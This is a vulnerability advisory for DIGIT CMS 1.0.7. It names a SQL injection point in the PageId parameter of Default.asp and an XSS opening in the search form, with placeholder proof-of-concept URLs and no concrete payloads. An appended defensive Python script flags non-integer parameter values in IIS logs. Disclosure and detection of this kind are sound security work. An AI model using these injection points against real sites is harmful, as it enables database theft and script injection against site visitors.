Title: DIGIT Cms SQL Injection / XSS Multiple Vulnerability
Author: BHG Security Center
Download URL:
Affected version: [1.0.7]
Tested on: ubuntu 11.04
Discovered by
    - Net.Edit0r (Net.edit0r [at] att [dot] net)
    - G3n3Rall (Ant1_s3cur1ty [at] yahoo [dot] com)
 
-----------------------------------------------------------------------------------------
DIGIT Israel Cms SQL Injection / XSS Multiple Vulnerability
-----------------------------------------------------------------------------------------
 
Author : BHG Security Center
Web    :
Where  : From Remote
---------------------------------------------------------------------------
 
PoC/Exploit:
~~~~~~~~~~
 
~ [PoC] ~: /website_path/Default.asp?sType=0&PageId=[Sqli]
 
~ [PoC] /path/Default.asp?sType=0&PageId=[Sqli]
 
 
 Enter XSS code in the search box ~
 
<FORM action="Default.asp?PageId=-1" method=POST id=searchFORM
name=searchFORM  style="margin:0;padding:0">
<INPUT type="hidden" value="" name="txtSEARCH">
</FORM>
 
~ [PoC] ~: /path/Default.asp
 
Note: There are vulnerabilities in the search field that you can use
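
For defenders triaging a site that runs this CMS, the following added example (not part of the original advisory) scans IIS W3C logs for Default.asp requests whose PageId or sType is not a plain integer. It assumes both parameters are numeric, as the PoC URLs and the form's PageId=-1 suggest; the function name and the sample log are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Assumption: PageId and sType are integers. The search form posts to
# PageId=-1, so a leading minus sign must be accepted as legitimate.
INT_RE = re.compile(r"-?\d{1,9}")
NUMERIC_PARAMS = ("pageid", "stype")  # classic ASP parameter names are case-insensitive

# Constructed sample in IIS W3C extended format (not taken from a real server).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2011-09-01 10:00:01 GET /Default.asp sType=0&PageId=12 192.0.2.10 200
2011-09-01 10:00:02 POST /Default.asp PageId=-1 192.0.2.10 200
2011-09-01 10:00:05 GET /Default.asp sType=0&PageId=12%27 192.0.2.77 500
2011-09-01 10:00:07 GET /default.asp stype=0&pageid=12&PageId=abc 192.0.2.77 200
2011-09-01 10:00:09 GET /images/logo.gif - 192.0.2.10 200
"""

def suspicious_requests(log_text):
    """Return (client_ip, param, value) for each non-integer PageId/sType on Default.asp."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # the column layout can change mid-file
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split(" ")))
        if not row.get("cs-uri-stem", "").lower().endswith("/default.asp"):
            continue
        query = row.get("cs-uri-query", "-")
        if query == "-":
            continue
        # parse_qs URL-decodes values and keeps every occurrence of a repeated key,
        # so a clean first value cannot hide a malformed second one.
        for key, values in parse_qs(query, keep_blank_values=True).items():
            if key.lower() not in NUMERIC_PARAMS:
                continue
            for value in values:
                if not INT_RE.fullmatch(value):
                    hits.append((row.get("c-ip", "?"), key, value))
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The txtSEARCH field is submitted by POST, so it does not appear in cs-uri-query and is outside what this log check can see.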